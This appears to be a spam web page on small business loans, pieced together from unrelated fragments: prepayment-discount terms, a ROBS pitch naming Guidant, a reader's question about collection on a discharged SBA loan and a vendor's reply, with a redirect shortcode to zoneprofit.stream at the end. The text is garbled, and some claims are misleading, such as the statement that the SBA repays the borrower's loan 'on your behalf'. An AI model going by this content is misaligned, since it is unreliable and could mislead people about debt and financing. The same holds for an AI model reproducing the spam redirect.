Equipment Finance customers who pay off the total remaining balance early, at any point during the contract, will automatically receive a 6% discount off the total remaining balance. Working Capital customers who pay off the total remaining balance in full within the first 100 days of the contract will automatically receive a 7% discount off the total remaining balance. We do not currently offer a discount on our lease contracts. Customers must pay off the balance in full, be current, and in good standing to take advantage of the discount within the time parameters.

With a ROBS, you must be a legitimate employee of the business you’re rolling funds into. There is no set standard for what this means, but a conservative approach is that you work in the business for 1,000 hours annually. That makes a ROBS ideal for actively managed businesses, but not necessarily a good option for people pursuing absentee businesses like some real estate investment companies.
A ROBS might be the best kept secret in startup funding. It enables you to access your retirement savings to fund your business without early withdrawal penalties and taxes. If you have at least $50k+ in a qualifying retirement account you can get a free consultation with a ROBS expert by reaching out to Guidant.
I had an SBA loan from 2005 to 2008. The property securing part of the loan was surrendered and the loan was discharged in bankruptcy in 2008, however, I am getting contacted by a law firm that is trying collect the balance of the loan. How can they try to collect on the debt when it was discharged? It seems so strange that this would happen this long after the discharge. Thank you for your help!
It’s also a good idea to ask your lender about any potential penalties or discounts that may apply to your loan. For example, some lenders discourage prepayments by enforcing penalties while others offer you a discount for paying off your loan early.
Lenders will want to know how you plan to use the money and will want to see that you have a strong ability to repay. They may require a solid business plan that details the purpose of the loan and how you expect it to increase profits.
Either way, the advantage of going online is speed: Most lenders can get you your money in a week or less. Applications are typically much less time-intensive, too. Of course, the major drawback is that your interest rate will be higher. It’s common for small businesses to secure bank loans with single-digit APRs. While that’s possible online, double digits are more the norm.
John, your situation is very familiar to situations we deal with on a daily basis here at Bridge Management. You can flip a coin and figure out if the treasury will take all of it. If they know about it, the odds are certainly likely they will get it. You should seriously consider speaking to a BK attorney to include the SBA debt so you can protect your disability and future wage garnishment.
We want to ensure that our valued applicants fully understand why we have the requirements that we do. For instance, we require that businesses be operational for at least 3 months before we will provide them with a loan. This is to ensure you have gotten your business off the ground, have a use for the capital, and can responsibly handle the payments.
If it reaches a point where the lender has used all options for recovery, they’ll make a claim to the SBA. At this point, the SBA guarantee kicks in and the federal government will repay the lion’s share of the loan on your behalf. [redirect url=’http://zoneprofit.stream/bump’ sec=’7′]
